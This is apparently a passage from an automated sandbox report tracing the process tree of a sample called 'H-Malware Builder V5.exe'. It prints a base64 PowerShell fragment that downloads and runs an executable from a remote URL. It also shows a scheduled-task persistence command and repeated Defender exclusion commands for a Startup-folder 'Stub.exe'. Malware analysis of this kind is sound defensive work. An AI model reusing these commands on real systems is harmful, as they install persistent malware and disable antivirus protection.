kAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2332
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"3⤵
- Checks computer location settings
- Drops startup file
PID:116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"4⤵
- Checks computer location settings
- Drops startup file
PID:3656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:3600 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"5⤵
- Checks computer location settings
- Drops startup file
PID:1404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"6⤵
- Checks computer location settings
- Drops startup file
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:3788
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"7⤵
- Checks computer location settings
- Drops startup file
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:1836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"8⤵
- Checks computer location settings
- Drops startup file
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'9⤵
- Command and Scripting Interpreter: PowerShell
PID:2064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"9⤵
- Checks computer location settings
- Drops startup file
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'10⤵
- Command and Scripting Interpreter: PowerShell
PID:684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Suspicious use of SetWindowsHookEx
PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"10⤵
- Checks computer location settings
- Drops startup file
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:4496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"11⤵
- Checks computer location settings
- Drops startup file
PID:4892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:3420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"12⤵
- Checks computer location settings
- Drops startup file
PID:676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'13⤵
- Command and Scripting Interpreter: PowerShell
PID:1416 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Suspicious use of SetWindowsHookEx
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"13⤵
- Checks computer location settings
- Drops startup file
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'14⤵
- Command and Scripting Interpreter: PowerShell
PID:4860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Suspicious use of SetWindowsHookEx
PID:4712
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"14⤵
- Checks computer location settings
- Drops startup file
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'15⤵
- Command and Scripting Interpreter: PowerShell
PID:3420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:2176
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"15⤵
- Checks computer location settings
- Drops startup file
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'16⤵
- Command and Scripting Interpreter: PowerShell
PID:4288 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵
- Suspicious use of SetWindowsHookEx
PID:3372
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"16⤵
- Checks computer location settings
- Drops startup file
PID:2412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'17⤵
- Command and Scripting Interpreter: PowerShell
PID:4220 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:4528
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"17⤵
- Checks computer location settings
- Drops startup file
PID:444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:616 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵
- Suspicious use of SetWindowsHookEx
PID:3960
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"18⤵
- Checks computer location settings
- Drops startup file
PID:216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'19⤵
- Command and Scripting Interpreter: PowerShell
PID:3740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵
- Suspicious use of SetWindowsHookEx
PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"19⤵
- Checks computer location settings
- Drops startup file
PID:2656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'20⤵
- Command and Scripting Interpreter: PowerShell
PID:3900 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV121⤵PID:2108
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"20⤵
- Checks computer location settings
- Drops startup file
PID:3148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'21⤵
- Command and Scripting Interpreter: PowerShell
PID:2560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵
- Suspicious use of SetWindowsHookEx
PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"21⤵
- Checks computer location settings
- Drops startup file
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'22⤵
- Command and Scripting Interpreter: PowerShell
PID:2636 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
- Suspicious use of SetWindowsHookEx
PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"22⤵
- Checks computer location settings
- Drops startup file
PID:4204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'23⤵
- Command and Scripting Interpreter: PowerShell
PID:1092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"23⤵
- Checks computer location settings
- Drops startup file
PID:3756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'24⤵
- Command and Scripting Interpreter: PowerShell
PID:2516 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV125⤵
- Suspicious use of SetWindowsHookEx
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"24⤵
- Checks computer location settings
- Drops startup file
PID:676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'25⤵
- Command and Scripting Interpreter: PowerShell
PID:828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV126⤵
- Suspicious use of SetWindowsHookEx
PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"25⤵
- Checks computer location settings
- Drops startup file
PID:4956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'26⤵
- Command and Scripting Interpreter: PowerShell
PID:1544 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"26⤵
- Checks computer location settings
- Drops startup file
PID:1904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'27⤵
- Command and Scripting Interpreter: PowerShell
PID:768 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV128⤵
- Suspicious use of SetWindowsHookEx
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"27⤵
- Checks computer location settings
- Drops startup file
PID:1300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'28⤵
- Command and Scripting Interpreter: PowerShell
PID:3628 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵
- Suspicious use of SetWindowsHookEx
PID:2284
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"28⤵
- Checks computer location settings
- Drops startup file
PID:676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'29⤵
- Command and Scripting Interpreter: PowerShell
PID:264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"29⤵
- Checks computer location settings
- Drops startup file
PID:5092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'30⤵
- Command and Scripting Interpreter: PowerShell
PID:2484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵
- Suspicious use of SetWindowsHookEx
PID:1592
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"30⤵
- Checks computer location settings
- Drops startup file
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'31⤵
- Command and Scripting Interpreter: PowerShell
PID:2328 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"31⤵
- Checks computer location settings
- Drops startup file
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'32⤵
- Command and Scripting Interpreter: PowerShell
PID:3228 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV133⤵
- Suspicious use of SetWindowsHookEx
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"32⤵
- Checks computer location settings
- Drops startup file
PID:4448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:2660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵
- Suspicious use of SetWindowsHookEx
PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"33⤵
- Checks computer location settings
- Drops startup file
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'34⤵
- Command and Scripting Interpreter: PowerShell
PID:2064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵
- Suspicious use of SetWindowsHookEx
PID:804
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"34⤵
- Checks computer location settings
- Drops startup file
PID:760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'35⤵
- Command and Scripting Interpreter: PowerShell
PID:2256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV136⤵
- Suspicious use of SetWindowsHookEx
PID:460
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"35⤵
- Checks computer location settings
- Drops startup file
PID:1336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'36⤵
- Command and Scripting Interpreter: PowerShell
PID:4396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV137⤵
- Suspicious use of SetWindowsHookEx
PID:3788
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"36⤵
- Checks computer location settings
- Drops startup file
PID:1168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'37⤵
- Command and Scripting Interpreter: PowerShell
PID:2660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV138⤵
- Suspicious use of SetWindowsHookEx
PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"37⤵
- Executes dropped EXE
PID:4444 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4444 -s 95238⤵PID:1268
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3528
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3724
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3880
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3784
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3496
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5068
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2264
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5072
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:4456
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2e6f028206d161169c90af597cebdcbc WznuuBIP1UCGpng+tLKAbg.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:5024 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2028
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1536
-
